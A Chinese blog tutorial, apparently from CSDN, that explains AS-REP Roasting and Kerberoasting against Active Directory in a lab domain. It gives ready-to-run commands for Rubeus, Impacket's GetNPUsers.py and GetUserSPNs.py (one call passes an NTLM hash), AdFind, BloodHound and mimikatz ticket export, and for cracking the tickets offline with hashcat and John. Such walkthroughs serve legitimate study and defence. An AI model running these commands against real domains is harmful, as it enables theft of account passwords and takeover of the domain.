AS-REP Roasting与Kerberoasting利用

已于 2023-03-26 00:45:55 修改
阅读量457 收藏 1
点赞数
分类专栏: 域安全 文章标签: 网络安全 系统安全 安全 信息安全 网络
于 2023-03-03 02:43:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/129234192
版权

文章目录

简介
本篇将讲解AS-REP Roasting与Kerberoasting配置过程与利用手法
AS-REP Roasting(域内机器)利用
AS-REP Roasting是一种对用户理想爆破的攻击方式,需要域用户配置了
不需要求Kerberos预身份认证,默认开启认证Kerberos预身份验证发生在
Kerberos身份验证的第一阶段AS_REQ & AS_REP,它主要作用是防止密码
离线破解,KDC会记录密码错误次数防止在线爆破。
配置:

在这里插入图片描述

AS-REP Roasting攻击步骤:
	1.获取AS-REP响应包中用户Hash加密的Login Session Key。
	2.对上一步获取的Login Session Key进行解密因为是通过用户Hash加密的。
AS-REP Roasting攻击条件:
	1.域用户勾选不要钱Kerberos预身份验证选项。
	2.需要一台与KDC 88端口进行通信的主机。	
Rubeus(域内机器)利用:
	Rubeus.exe asreproast /format:john /outfile:hash.txt

在这里插入图片描述

ASREPROast.ps1(域内机器)脚本利用
	下载:	
	https://github.com/HarmJ0y/ASREPRoast
	修改powershell策略可以加载脚本
	Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser
	命令:
	Import-Module .\ASREPRoast.ps1
	Invoke-ASREPRoast | select -ExpandProperty Hash

在这里插入图片描述

AS-REP Roasting(非域内机器)利用
非域内机器的我这里的利用思路是通过adfind或者bloodhound查询不需要Kerberos
预身份验证的账户,之后在使用Impacket下的GetNPUsers.py脚本获取指定用户的Hash
加密的Login Session Key。
Adfind查询:
	Adfind.exe -h 10.211.55.100 -u test\lisi -up Pass123 -f "useraccountcontrol:1.2.840.113556.1.4.803:=4194304" dn

在这里插入图片描述

bloodhound分析:
	bloodhound.py脚本抓取域信息
	命令:
	bloodhound.py -u lisi  -d test.com -ns 10.211.55.100 -c DcOnly

在这里插入图片描述
在这里插入图片描述

使用Impacket下的GetNPUsers.py获取Hash
命令:
	python3 GetNPUsers.py -dc-ip 10.211.55.100 -usersfile users.txt -format john test.com/

在这里插入图片描述

使用John爆破AS-REP Roasting Hash
将获取到的Hash保存到txt文件中,爆破成功与否和字典强度有关。
命令:
	john --wordlist=/xxx/字典.txt hash.txt

在这里插入图片描述

Kerberoasting简述
Kerberoasting攻击发生在Kerberos协议的TGS_REP阶段,KDC的TGS是由服务Hash加密的ST给客户端,
由于ST是用服务Hash进行加密的,因此客户端在拿到ST之后可以用于本地离线爆破,如果该服务由高权限
用户Hash加密的则肯能直接接管域控。
Kerberoasting攻击过程:
	1.攻击者提供一个正常域用户密码进行认证获得TGT。
	2.攻击者使用该TGT针对指定SPN请求。
	3.KDC验证TGT之后服务Hash加密的ST(不管TGT是否有权限使用都会返回ST)。
	4.攻击者离线爆破该ST。
Kerberoasting注意:
	攻击一般只针对于注册在用户下的SPN,机器账户的密码太过于复杂是128位的字符不可能爆破出来。
Kerberoasting攻击步骤:
	1.查询域内注册于域用户下的SPN
	2.请求指定SPN的ST
	3.导出ST
	4.对导出的ST进行离线破解
Kerberoasting环境配置
在域控下打开powershell执行一下命令:
setspn -S Hacker/test.com kerberoasting
命令解释:
Hacker是服务名
test.com是域名
kerberoasting是域用户名

在这里插入图片描述

查询所有SPN命令看看是否配置成功
setspn -q */*

在这里插入图片描述

Kerberoasting发现
Adfind查询配置了SPN的域内用户账户
命令:
	AdFind.exe -f "&(objectCategory=person)(objectClass=user)(servicePrincipalName=*)" -nodn samaccountname

在这里插入图片描述

bloodhound查询配置了域内用户账户的SPN
Analysis下Shortest Paths中Shortest Paths from Kerberoastable Users

在这里插入图片描述

Kerberoasting请求服务票据
GetUserSPNs.py工具请求服务票据:
	Impacket中的GetUserSPNs.py脚本可以请求注册于用户下所有SPN的服务票据,
	也可以请求注册于指定用户下的SPN服务票据。
	请求注册于用户下所有SPN的服务票据,并以hashcat能够破解的格式保存为spn.txt文件:
	GetUserSPNs.py -request -dc-ip 10.211.55.100 'test.com/ruyu' -hashes :4c25ed57e37131073192a98148fbc30f -outputfile spn.txt

在这里插入图片描述

请求注册于指定用户下的SPN服务票据,并以hashcat能够破解的格式保存
GetUserSPNs.py -request -dc-ip 10.211.55.100 'test.com/ruyu' -hashes :4c25ed57e37131073192a98148fbc30f -outputfile spn.txt -request-user 账户名

在这里插入图片描述

Rubeus 请求:
	请求注册于用户下所有SPN的服务票据,并以hashcat能破解的方式保存spn.txt
	Rubeus.exe kerberoast /format:john /outfile:spn.txt
	请求注册于用户下指定SPN的服务票据,并以john能够破解的方式保存spn.txt
	Rubeus.exe kerberoast /spn:SPN名称 /format:john /outfile:spn.txt
mimikatz请求服务票据
	请求指导SPN的服务票据
	kerberos::ask /target:SPN名称

在这里插入图片描述

cmd下klist查看票据
mimikatz下kerberos::list查看票据

在这里插入图片描述

mimikatz导出票据命令:
	mimikatz.exe "kerberos::list /export"  "exit"

在这里插入图片描述

破解服务票据
hashcat破解服务票据:
	hashcat是针对Impacket或Rebus请求的票据格式。
	hashcat -m 13100 spn.txt pass.txt --force

在这里插入图片描述

kerberoast破解服务票据
	kerberoast用于攻击Kerberos实现的一些工具集合,该工具中tgsrepcrack.py脚本可以针对
	mimikatz.exe导出的.kirbi格式票据文件进行爆破。	
	命令:
	 python2 tgsrepcrack.py pass.txt 1-40a10000-lisi@Hacker\~test.com-TEST.COM.kirbi
虚构之人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
AS-REP Roasting攻击
谢公子的博客
03-29 2335
首先,关闭hack2用户的 Kerberos预身份验证。 然后使用 Rubeus执行如下命令 Rubeus.exe asreproast 然后使用hashcat进行爆破
域渗透-AS-REP Roasting攻击
good good study
03-25 1400
AS-REP Roasting攻击是一种针对域用户账号hash进行离线爆破的攻击方式,它利用了Kerberos协议中的特定漏洞。
AS-REPRoasting
Ping_Pig的博客
12-30 1341
讲在前面: 最近笔者发布的几篇文章,大家不难发现,都是和kerberos协议相关的。国内外各类的研究员对于该协议的研究愈发的深入,从该协议产生的漏洞就会越来越多甚至越来越严重。当然这只是笔者的一点拙见。 在介绍了Kerberoasting后,与其分不开的一个漏洞AS-REPRoasting我们也要介绍一下。当然,该漏洞依然要建立在受害用户没有使用强壮的符合复杂策略的密码前提下。同时也要强调该漏洞并没有Kerberoasting出彩 简介: 对于域用户,如果设置了选项”Do not requir...
域渗透之AS-REP Roasting
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-13 592
攻击者可以使用指定的用户去请求票据,向域控制器发送AS_REQ请求,此时域控会不作任何验证便将 TGT 票据和加密的 Session-key 等信息返回。因此攻击者就可以对获取到的加密 Session-key 进行离线破解,如果爆破成功,就能得到该指定用户的明文密码。
内网安全--AS-REP Roasting攻击
最新发布
weixin_45910629的博客
04-10 631
AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。但是该攻击方式利用比较局限,因为其需要用户账户设置“不要求Kerberos预身份验证”选项,而该选项是默认没有勾选上的。Kerberos预身份验证发送在Kerberos身份验证的第一阶段(AS_REQ&AS-REP),它的主要作用是防止密码离线爆破。默认情况下,预身份验证是开启的,KDC会记录密码错误次数,防止在线爆破。
V-rep软件仿真安装包亲测可用
10-23
7. **网络通信**:V-rep支持ROS(Robot Operating System)和其他网络协议,可以与实际硬件或远程服务器进行通信,实现远程控制和数据交换。 8. **教学资源**:V-rep EDU版可能附带了一些教学案例和教程,帮助初学...
V-rep安装文件.txt
04-20
由于https://www.coppeliarobotics.com/网站需要翻墙才能...V-REP_PRO_EDU_V3_6_2_Ubuntu18_04,V-REP_PRO_EDU_V3_6_2_Setup,V-REP_PRO_EDU_V3_5_0_Setup,V-REP_PRO_EDU_V3_5_0_Linux,V-REP_PRO_EDU_V3_3_2_Setup
V-rep and its Matlab interface
07-03
这意味着用户可以利用Matlab强大的数值计算和数据分析能力来处理V-REP提供的仿真结果。这种接口通常是通过调用远程API来实现的,即Matlab向V-REP发送命令并接收数据。使用Matlab接口的好处在于可以进行复杂的数据...
基于V-REP与MATLAB的机器人仿真应用.pdf
06-24
利用V-REP与MATLAB完成机器人加工仿真,首先通过CAM软件生成工件的加工后处理文件;其次用MATLAB读取后处理文件的刀轨迹信息并进行相应的计算以获取刀具轨迹对应的机器人关节角;然后在V-REP与MATLAB之间搭建通讯接口,...
v-rep六足建模
10-11
对六足进行了建模,并写好了运行程序,可以根据自己的需要自行修改
内网渗透(六十)之AS-REP Roasting攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-30 1301
AS-REP Roasting是一种针对用户账户进行离线爆破的攻击方式。但是该攻击方式使用上比较受限,因为其需要用户账户设置“不要求Kerberos预身份验证”选项。而该选项默认是没有勾选的。Kerberos域身份验证发生在Kerberos身份验证的第一阶段(AS_REQ&AS_REP),它的主要作用就是防止密码离线爆破。默认情况下,预身份验证是开启的,KDC会记录密码错误的次数,防止在线爆破。
SPN与kerberosting攻击
热门推荐
Shanfenglan's blog
10-16 11万+
CATALOG前言利用思路实际利用探测内网服务kerberosting参考文章 前言 SPN是域内一个服务的唯一标示名称。SPN类型分为两种: 一种注册在AD上机器帐户(Computers)下,当一个服务的权限为Local System或Network Service,则SPN注册在机器帐户(Computers)下 另一种注册在域用户帐户(Users)下,当一个服务的权限为一个域用户,则SPN注册在域用户帐户(Users)下如果用一句话来说明的话就是如果想使用 Kerberos 协议来认证服务,那么必须正
kerberos协议从0到1
蚁景网安学院
10-12 669
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题技术相关的调查或分析稿件通过并发布还能收获200-800元不等的稿酬概...
集权攻击-无权限条件下AD域凭据获取与利用分析
ZAWX_NETSTARSEC的博客
05-25 1193
我们简单回顾服务票据的请求流程,当域内用户去请求域内某个服务资源时,先会通过AS-REQ进行身份认证,通过后会返回TGT给用户,用户使用TGT发起TGS请求,KDC会返回一个用对应服务账户的Hash加密的服务票据。那么如果我们有一个域用户的凭据可以正常申请TGT,就可以申请指定服务的TGS票据,因该票据使用服务账户的Hash进行加密,当获取到加密后的TGS票据后,即可根据离线爆破得到服务账户的密码,这样请求服务账号票据进行离线爆破的攻击手法叫做Kerberoasting。而该属性默认是没有勾选上的。
Kerberoasting学习
mingyqf的博客
02-24 827
Author: Shu1L Link: https://shu1l.github.io/2020/08/05/kerberosating-gong-ji-xue-xi/ 前言 Kerberoasting攻击是Tim Medin在DerbyCon 2014 上发布的一种域口令攻击方法,Tim Medin同时发布了 配套的攻击工具kerberoast。此后,不少研究人员对Ker beroasting进行了改进和扩展,在GitHub上开发发布了 大量工具,使得Kerberoasting逐渐发展成为域攻击的常用方法
Kerberoasting——域渗透
include_voidmain的博客
03-30 411
0x01 前言 前一阵刚刚写了kerberos协议的原理,就是为了给后续的几篇文章做一下铺垫,保证大家都能看懂,尽量以简要的话术来描述,欢迎翻阅前面的文章进行查看。 0x02 Kerberoasting Kerberoasting 是一种在请求访问服务时利用 Kerberos 协议中的弱点的技术。 首先会看以下kerberos认证的流程: Client想要访问Server的服务时,先要向AS发送能够证明自己身份的验证 验证通过后AS会给Client发送一个TGT 随后Client再向TGS去验证
Kerberosating攻击
qq_53058639的博客
08-11 106
Kerberosating攻击发生在Kerberos协议的TGS_REP阶段,KDC的TGS服务返回一个由服务Hash加密的ST给客户端。由于该ST是用服务Hash进行加密的,因此客户端在拿到该ST后可以用于本地离线爆破。如果攻击者的密码字典足够强大,则很有可能爆破出SPN链接用户的明文密码。如果该服务在域内被配置为高权限运行,那么攻击者可能接管整个域。整个过程的核心点在于,攻击者和KDC协商ST加密的时候,协商的是使用RC4_HMAC_MD5加密算法。
Kerberos协议分析及域服务器配置以及黄金白银票据攻击复现
nopants的博客
06-16 1015
域服务器搭建以及用户加入域服务器及黄金白银票据攻击的验证复现
域渗透技术解析:Roasting AS-REP
systemino的博客
07-02 963
去年11月,我发表了一篇名为"没有 Mimikatz 的 Kerberoast 攻击利用"的文章,详细介绍了PowerView和Tim Medin提出的Kerberoasting 攻击的最新研究进展。这使我开始更仔细地研究 Kerberos。 几周前,我的同事Lee Christensen发现Exumbra Operations的Geoff Janjua做了一个有趣的演讲,题为"武器化 Kerbe...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值